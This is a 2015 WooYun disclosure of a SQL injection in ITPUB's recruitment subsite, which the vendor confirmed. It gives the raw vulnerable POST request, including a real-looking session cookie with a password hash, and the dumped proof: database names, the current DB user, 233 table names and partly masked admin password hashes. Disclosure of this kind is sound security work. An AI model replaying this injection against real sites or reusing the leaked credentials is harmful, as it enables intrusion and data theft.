当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141654

漏洞标题:ITPUB某分站POST注入漏洞(涉及11个数据库/控制后台)

相关厂商:ITPUB

漏洞作者: Xmyth_Xi2oMin9

提交时间:2015-09-17 10:42

修复时间:2015-11-01 10:50

公开时间:2015-11-01 10:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-17: 细节已通知厂商并且等待厂商处理中
2015-09-17: 厂商已经确认,细节仅向厂商公开
2015-09-27: 细节向核心白帽子及相关领域专家公开
2015-10-07: 细节向普通白帽子公开
2015-10-17: 细节向实习白帽子公开
2015-11-01: 细节向公众公开

简要描述:

RT

详细说明:

站点:http://job.itpub.net
测试注入:

POST /enterprise/newjobs.php?comm=update HTTP/1.1
Host: job.itpub.net
Proxy-Connection: keep-alive
Content-Length: 257
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://job.itpub.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://job.itpub.net/enterprise/newjobs.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: vjuids=-1675f8de4.14fd580b9a6.0.32960f1f; __utmt=1; __gads=ID=3f1254c47b3ee5b6:T=1442396137:S=ALNI_MaXyOscFH0jDn4HoxYAWILefwIgcg; __utma=122732244.1447527647.1442396060.1442396060.1442396060.1; __utmb=122732244.10.10.1442396060; __utmc=122732244; __utmz=122732244.1442396060.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_5016281862f595e78ffa42f085ea0f49=1442396061; Hm_lpvt_5016281862f595e78ffa42f085ea0f49=1442396219; pgv_pvi=104751498; pgv_info=ssi=s1215136893; euid=2602; euname=qingyou; eupass=14e1b600b1fd579f47433b88e8d85291; vjlast=1442396027.1442396027.30; __pta=2131536967.1442395998.1442396586.1442396588.48; __pts=559924916; __ptb=559924916
hdnTodo=save&jobtitle=323&jobtype=%BC%E6%D6%B0&position=%CA%D7%CF%AF%BC%BC%CA%F5%D6%B4%D0%D0%B9%D9&daynum=30&headcount=0&salary=0&state=%C9%CF%BA%A3&city=%C9%CF%BA%A3&reqwyear=255&degree=255&info=4324&rdoJobCcType=1&email=123456%40qq.com&Submit=%B1%A3%B4%E6

漏洞证明:

数据库:

available databases [11]:
[*] cuda
[*] information_schema
[*] ipflux
[*] ipfluxblog
[*] itblog_yii
[*] job
[*] plog
[*] pub_it
[*] pub_it_dx2
[*] pub_it_xs
[*] test


当前用户:

current user:    'vbbuser@192.168.%.%'


cuda数据库:

[233 tables]
+------------------------------------+
| pre_b10j_cache                     |
| pre_b10j_post                      |
| pre_common_addon                   |
| pre_common_admincp_cmenu           |
| pre_common_admincp_group           |
| pre_common_admincp_member          |
| pre_common_admincp_perm            |
| pre_common_admincp_session         |
| pre_common_admingroup              |
| pre_common_adminnote               |
| pre_common_advertisement           |
| pre_common_advertisement_custom    |
| pre_common_banned                  |
| pre_common_block                   |
| pre_common_block_favorite          |
| pre_common_block_item              |
| pre_common_block_item_data         |
| pre_common_block_permission        |
| pre_common_block_pic               |
| pre_common_block_style             |
| pre_common_block_xml               |
| pre_common_cache                   |
| pre_common_card                    |
| pre_common_card_log                |
| pre_common_card_type               |
| pre_common_credit_log              |
| pre_common_credit_rule             |
| pre_common_credit_rule_log         |
| pre_common_credit_rule_log_field   |
| pre_common_cron                    |
| pre_common_district                |
| pre_common_diy_data                |
| pre_common_domain                  |
| pre_common_failedlogin             |
| pre_common_friendlink              |
| pre_common_grouppm                 |
| pre_common_invite                  |
| pre_common_magic                   |
| pre_common_magiclog                |
| pre_common_mailcron                |
| pre_common_mailqueue               |
| pre_common_member                  |
| pre_common_member_action_log       |
| pre_common_member_connect          |
| pre_common_member_count            |
| pre_common_member_field_forum      |
| pre_common_member_field_home       |
| pre_common_member_grouppm          |
| pre_common_member_log              |
| pre_common_member_magic            |
| pre_common_member_profile          |
| pre_common_member_profile_setting  |
| pre_common_member_security         |
| pre_common_member_stat_field       |
| pre_common_member_stat_fieldcache  |
| pre_common_member_stat_search      |
| pre_common_member_stat_searchcache |
| pre_common_member_status           |
| pre_common_member_validate         |
| pre_common_member_verify           |
| pre_common_member_verify_info      |
| pre_common_moderate                |
| pre_common_myapp                   |
| pre_common_myinvite                |
| pre_common_mytask                  |
| pre_common_nav                     |
| pre_common_onlinetime              |
| pre_common_plugin                  |
| pre_common_pluginvar               |
| pre_common_process                 |
| pre_common_regip                   |
| pre_common_relatedlink             |
| pre_common_report                  |
| pre_common_searchindex             |
| pre_common_secquestion             |
| pre_common_session                 |
| pre_common_setting                 |
| pre_common_smiley                  |
| pre_common_sphinxcounter           |
| pre_common_stat                    |
| pre_common_statuser                |
| pre_common_style                   |
| pre_common_stylevar                |
| pre_common_syscache                |
| pre_common_tag                     |
| pre_common_tagitem                 |
| pre_common_task                    |
| pre_common_taskvar                 |
| pre_common_template                |
| pre_common_template_block          |
| pre_common_template_permission     |
| pre_common_uin_black               |
| pre_common_usergroup               |
| pre_common_usergroup_field         |
| pre_common_word                    |
| pre_common_word_type               |
| pre_connect_feedlog                |
| pre_connect_memberbindlog          |
| pre_connect_tlog                   |
| pre_dsu_paulsign                   |
| pre_dsu_paulsignset                |
| pre_extra_cuda_addlog              |
| pre_extra_cuda_creditslog          |
| pre_extra_cuda_soft                |
| pre_forum_access                   |
| pre_forum_activity                 |
| pre_forum_activityapply            |
| pre_forum_announcement             |
| pre_forum_attachment               |
| pre_forum_attachment_0             |
| pre_forum_attachment_1             |
| pre_forum_attachment_2             |
| pre_forum_attachment_3             |
| pre_forum_attachment_4             |
| pre_forum_attachment_5             |
| pre_forum_attachment_6             |
| pre_forum_attachment_7             |
| pre_forum_attachment_8             |
| pre_forum_attachment_9             |
| pre_forum_attachment_unused        |
| pre_forum_attachtype               |
| pre_forum_bbcode                   |
| pre_forum_creditslog               |
| pre_forum_debate                   |
| pre_forum_debatepost               |
| pre_forum_faq                      |
| pre_forum_forum                    |
| pre_forum_forum_threadtable        |
| pre_forum_forumfield               |
| pre_forum_forumrecommend           |
| pre_forum_groupcreditslog          |
| pre_forum_groupfield               |
| pre_forum_groupinvite              |
| pre_forum_grouplevel               |
| pre_forum_groupranking             |
| pre_forum_groupuser                |
| pre_forum_imagetype                |
| pre_forum_medal                    |
| pre_forum_medallog                 |
| pre_forum_memberrecommend          |
| pre_forum_moderator                |
| pre_forum_modwork                  |
| pre_forum_onlinelist               |
| pre_forum_order                    |
| pre_forum_poll                     |
| pre_forum_polloption               |
| pre_forum_pollvoter                |
| pre_forum_post                     |
| pre_forum_post_location            |
| pre_forum_post_tableid             |
| pre_forum_postcomment              |
| pre_forum_postlog                  |
| pre_forum_postposition             |
| pre_forum_poststick                |
| pre_forum_promotion                |
| pre_forum_ratelog                  |
| pre_forum_relatedthread            |
| pre_forum_replycredit              |
| pre_forum_rsscache                 |
| pre_forum_spacecache               |
| pre_forum_statlog                  |
| pre_forum_thread                   |
| pre_forum_threadclass              |
| pre_forum_threadimage              |
| pre_forum_threadlog                |
| pre_forum_threadmod                |
| pre_forum_threadpartake            |
| pre_forum_threadrush               |
| pre_forum_threadtype               |
| pre_forum_trade                    |
| pre_forum_tradecomment             |
| pre_forum_tradelog                 |
| pre_forum_typeoption               |
| pre_forum_typeoptionvar            |
| pre_forum_typevar                  |
| pre_forum_warning                  |
| pre_home_album                     |
| pre_home_album_category            |
| pre_home_appcreditlog              |
| pre_home_blacklist                 |
| pre_home_blog                      |
| pre_home_blog_category             |
| pre_home_blogfield                 |
| pre_home_class                     |
| pre_home_click                     |
| pre_home_clickuser                 |
| pre_home_comment                   |
| pre_home_docomment                 |
| pre_home_doing                     |
| pre_home_favorite                  |
| pre_home_feed                      |
| pre_home_feed_app                  |
| pre_home_friend                    |
| pre_home_friend_request            |
| pre_home_friendlog                 |
| pre_home_notification              |
| pre_home_pic                       |
| pre_home_picfield                  |
| pre_home_poke                      |
| pre_home_pokearchive               |
| pre_home_share                     |
| pre_home_show                      |
| pre_home_specialuser               |
| pre_home_userapp                   |
| pre_home_userappfield              |
| pre_home_visitor                   |
| pre_phpcome_gift_address           |
| pre_phpcome_gift_comment           |
| pre_phpcome_gift_goods             |
| pre_phpcome_gift_group             |
| pre_phpcome_gift_info              |
| pre_phpcome_gift_order             |
| pre_portal_article_content         |
| pre_portal_article_count           |
| pre_portal_article_related         |
| pre_portal_article_title           |
| pre_portal_article_trash           |
| pre_portal_attachment              |
| pre_portal_category                |
| pre_portal_category_permission     |
| pre_portal_comment                 |
| pre_portal_rsscache                |
| pre_portal_topic                   |
| pre_portal_topic_pic               |
| pre_tools_censorhome               |
| pre_tools_rule                     |
| pre_xwb_bind_info                  |
| pre_xwb_bind_thread                |
| pre_xwb_session                    |
| pre_zywx_forum_postfield           |
| pre_zywx_home_blogfield            |
| pre_zywx_useroperation             |
| pre_zywx_useroperation_log         |
+------------------------------------+


后台密码(神器的马赛克):

+-------------+------------------------------------------+
| username    | password                                 |
+-------------+------------------------------------------+
| gaohongfeng | AAAAAAAAAAAAfb4f40c36b74afe841aa         |
| gaoyang     | AAAAAAAAAAAA3857086116d7099885ee         |
| admin       | AAAAAAAAAAAAa6ed8b372722bf595953         |
| tangchuan   | AAAAAAAAAAAA0c908810c06ab1ff3967         |
| tc          | AAAAAAAAAAAA0c908810c06ab1ff3967         |
+-------------+------------------------------------------+


招聘资料:

11aa.jpg

233.jpg


企业资料:

2s.jpg

2ss.jpg

修复方案:

虽然你们忽略我的洞了

版权声明:转载请注明来源 Xmyth_Xi2oMin9@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-09-17 10:48

厂商回复:

多谢

最新状态:

暂无

漏洞评价:

评论